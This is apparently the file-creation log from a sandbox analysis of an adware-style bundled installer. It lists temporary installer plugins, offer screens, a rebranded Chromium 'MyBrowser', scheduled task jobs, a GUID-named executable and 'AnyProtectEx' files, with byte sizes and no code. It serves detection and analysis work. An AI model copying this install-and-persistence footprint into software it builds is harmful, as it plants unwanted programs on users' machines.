%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\img12_1.jpg (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\manlib.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\registry.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\FCL_Co_Unq_remote_v5[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\header.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\DSS_Unq_IMapplication_mon_remote[1].htm (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\FirstResult.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsisunz.dll (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\blowfish.dll (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\serlib.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\nsCBHTML5.dll (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_12.html (1681 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\GetVersion.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer1.zip (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\inner.png (146 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\SecondResult.txt (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\OfferScreen_460.html (2281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3F.tmp\Offer2.zip (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr18.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr19.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy3A.tmp (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj39.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj38.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh33.tmp (28320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\BiTool[1].dll (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\modern-wizard.bmp (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb32.tmp (108018 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bitool.xxx (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\xml.dll (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsis142.xml (1557 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Banner.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\binsischeck654.xml (4183 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn31.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup[1].exe (28320 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gizmodo.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\icon.json (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\priceline.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\theguardian.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nba.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_translate.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\msn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ted.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\cnn.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\pinterest.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\search.ico (1917 bytes)
%WinDir%\Tasks\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.job (1656 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\youtube.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\expedia.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\groupom.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\skype.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\reddit.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\icon.json (21 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\theguardian.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\booking.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\facebook.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA\9232CF1F-EBBF-4E0A-9DC4-74BA5474ABA.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_search.ico (5593 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yandex.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\espn.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail_live_msn.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yelp.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\chrome.packed.7z (1342431 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (313192 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\expedia.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bbc.ico (1588 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\hotels.com.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\nytimes.ico (1921 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\ebay.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\linkedin.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail_live_msn.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tripadvisor.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\twitter.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ie.zip[1].001 (3985887 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tripadvisor.ico (58 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\netflix.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (823 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ikea.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nfl.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\mail.ru.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\tumblr.ico (1592 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\facebook.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\agoda.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\target.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\amazon.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\Icons\bing.ico (1597 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8819.exe (14988 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\chrome.7z (1161171 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf48.tmp (19514 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (11 bytes)
